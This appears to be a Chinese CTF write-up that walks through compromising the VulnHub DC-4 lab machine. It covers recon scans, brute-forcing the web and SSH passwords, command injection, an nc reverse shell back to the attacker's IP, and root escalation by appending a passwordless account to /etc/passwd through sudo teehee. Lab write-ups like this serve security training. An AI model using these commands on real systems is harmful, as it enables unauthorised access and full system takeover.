一、介绍
运行环境:Virtualbox
攻击机:kali(10.0.2.15)
靶机:DC4(10.0.2.57)
目标:获取靶机root权限和flag
靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/
二、信息收集
使用nmap主机发现靶机ip:10.0.2.57
使用nmap端口扫描发现靶机开放端口:22、80
打开网站是一个登录页面,查看源码也没有发现隐藏信息
使用gobuster和dirsearch工具进行目录爆破,未发现什么有用的目录和文件
gobuster dir -u http://10.0.2.57/ -x txt,php,html,bak --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtdirsearch -u http://10.0.2.57
三、漏洞利用
登录界面可以使用sqlmap跑一下看看有没有sql注入,但发现没有
只能进行暴力破解看看了,使用用户名admin,爆破密码
爆破得到密码:happy
,登录网站
把网站各个功能点点击一下,发现命令执行ls -l
抓包修改命令为id
,执行命令成功
使用nc反弹shell
which+nc #查看是否存在nc
nc+-e+/bin/bash+10.0.2.15+4444
获取交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
四、提权
翻一翻靶机各个文件夹,在/home/jim/backups
文件夹下发现old-passwords.bak
文件,该文件是一个字典文件
使用该字典对jim用户的ssh进行暴力破解,得到密码:jibril04
使用ssh登录jim用户
运行命令find / -perm -u=s -type f 2>/dev/null
查看一下具有SUID
权限的二进制可执行文件,发现/home/jim/test.sh
文件
查看该脚本的内容,利用不了
在/var/www/html
目录下还发现了jim的邮件信息,里面存在charles用户的密码:^xHhA&hvim0y
切换为charles用户,使用命令sudo -l
查看该用户的sudo命令,发现可以无密码执行/usr/bin/teehee
命令
查看teehee命令帮助信息
teehee --help
搜索利用方法:tee | GTFOBins
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"
我们可以用teehee命令写一些信息到/etc/passwd
文件里面,进行提权
echo "myroot::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
获取flag
参考链接:DC-4靶场实战详解-CSDN博客